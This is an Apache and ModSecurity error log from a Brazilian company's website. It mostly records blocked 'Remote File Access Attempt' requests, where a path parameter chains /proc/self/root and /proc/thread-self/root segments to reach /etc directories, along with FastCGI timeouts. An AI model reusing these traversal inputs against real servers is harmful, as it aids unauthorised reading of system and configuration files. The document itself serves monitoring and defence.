"www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abovDta6ubjKNq_cu4ZJyQAAA0k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 01:50:24.785205 2026] [:error] [pid 11816:tid 140411574073088] [client 74.7.241.31:35716] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abovEOw_le52K8_3pV2TpwAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 01:50:25.552293 2026] [:error] [pid 15826:tid 140411616036608] [client 74.7.243.128:48392] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abovEeoXxyEfFpUF8f8hDAAAAU8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 01:50:28.423242 2026] [:error] [pid 30077:tid 140411733534464] [client 74.7.243.128:48402] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abovFPu8EFLIOrSqIpu7wQAAAkE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 01:50:44.129317 2026] [proxy_fcgi:error] [pid 19507:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:34472] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:51:06.051026 2026] [proxy_fcgi:error] [pid 19507:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:34850] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:51:29.133782 2026] [proxy_fcgi:error] [pid 30077:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:35176] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:51:35.341536 2026] [:error] [pid 30077:tid 140411582465792] [client 74.7.241.31:33366] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abovV_u8EFLIOrSqIpu75gAAAlM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 01:51:36.055233 2026] [:error] [pid 17887:tid 140411699963648] [client 74.7.243.128:46276] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abovWAkwaGbbGflqUZDHogAAAMU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 01:51:48.842164 2026] [:error] [pid 31803:tid 140411574073088] [client 74.7.241.31:38354] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abovZOyqAr6etmhZHNprOgAAAFQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 01:51:49.548068 2026] [:error] [pid 11816:tid 140411599251200] [client 74.7.243.128:50242] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abovZew_le52K8_3pV2TwwAAAhE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 01:51:51.119497 2026] [proxy_fcgi:error] [pid 11816:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:35456] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:52:10.776308 2026] [:error] [pid 17653:tid 140411716749056] [client 216.73.216.191:18649] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abovesdf6f5d65gmYZSDNgAAAsM"]
[Wed Mar 18 01:52:12.129833 2026] [proxy_fcgi:error] [pid 26799:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:35794] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:52:34.129798 2026] [proxy_fcgi:error] [pid 26799:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:36092] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:52:56.125799 2026] [proxy_fcgi:error] [pid 15826:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:36346] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:52:59.820449 2026] [:error] [pid 30077:tid 140411582465792] [client 216.73.216.191:29519] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abovq_u8EFLIOrSqIpu7_AAAAlM"]
[Wed Mar 18 01:53:18.133861 2026] [proxy_fcgi:error] [pid 31803:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:36668] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:53:20.092247 2026] [:error] [pid 15826:tid 140411708356352] [client 74.7.241.31:50182] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abovwOoXxyEfFpUF8f8hSQAAAUQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 01:53:40.117832 2026] [proxy_fcgi:error] [pid 15051:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:36994] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:53:44.692121 2026] [:error] [pid 29882:tid 140411616036608] [client 74.7.241.31:51164] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abov2EzinOy1jxa1j4fFCwAAAQ8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 01:53:50.723567 2026] [:error] [pid 31803:tid 140411599251200] [client 216.73.216.191:5411] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abov3uyqAr6etmhZHNprVgAAAFE"]
[Wed Mar 18 01:54:02.141897 2026] [proxy_fcgi:error] [pid 19507:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:37280] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:54:24.129780 2026] [proxy_fcgi:error] [pid 30077:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:37594] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:54:46.125796 2026] [proxy_fcgi:error] [pid 19507:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:37884] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:55:09.121803 2026] [proxy_fcgi:error] [pid 30077:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:38238] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:55:13.526550 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.243.128:35028] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abowMda6ubjKNq_cu4ZKQwAAA1c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 01:55:31.121841 2026] [proxy_fcgi:error] [pid 15051:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:38594] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:55:52.128494 2026] [proxy_fcgi:error] [pid 31803:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:38908] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:56:06.095685 2026] [:error] [pid 29882:tid 140411582465792] [client 216.73.216.191:28292] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abowZkzinOy1jxa1j4fFKgAAARM"]
[Wed Mar 18 01:56:14.055840 2026] [proxy_fcgi:error] [pid 31803:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:39144] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:56:20.791634 2026] [mime_magic:error] [pid 15051:tid 140411733534464] (70014)End of file found: [client 74.7.243.128:51980] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/lib/firmware
[Wed Mar 18 01:56:20.791902 2026] [access_compat:error] [pid 15051:tid 140411733534464] [client 74.7.243.128:51980] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php5, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/lib/firmware
[Wed Mar 18 01:56:26.072639 2026] [:error] [pid 31803:tid 140411716749056] [client 216.73.216.191:30943] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboweuyqAr6etmhZHNprfAAAAEM"]
[Wed Mar 18 01:56:36.129848 2026] [proxy_fcgi:error] [pid 26799:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:39518] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:56:50.559787 2026] [mime_magic:error] [pid 15826:tid 140411716749056] (70014)End of file found: [client 74.7.243.128:40180] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/lib/tuned/hpc-compute
[Wed Mar 18 01:56:51.428770 2026] [:error] [pid 11816:tid 140411716749056] [client 74.7.243.128:34692] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abowk-w_le52K8_3pV2T9wAAAgM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 01:56:58.140444 2026] [proxy_fcgi:error] [pid 26799:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:39916] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:57:02.705507 2026] [:error] [pid 29882:tid 140411641214720] [client 74.7.243.128:34702] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abownkzinOy1jxa1j4fFNQAAAQw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 01:57:20.125806 2026] [proxy_fcgi:error] [pid 17653:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:40166] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:57:27.780412 2026] [core:alert] [pid 30077:tid 140411691570944] [client 74.7.243.128:39868] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/var/lib/cloud/instances/done
[Wed Mar 18 01:57:43.127403 2026] [proxy_fcgi:error] [pid 30077:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:40438] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 01:57:44.286163 2026] [:error] [pid 19507:tid 140411616036608] [client 74.7.243.128:41204] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abowyNY0UrI5A3LftIxDywAAAY8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 01:58:06.041857 2026] [proxy_fcgi:error] [pid 19507:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:40670] AH01075: Error dispatching request to : (polling)
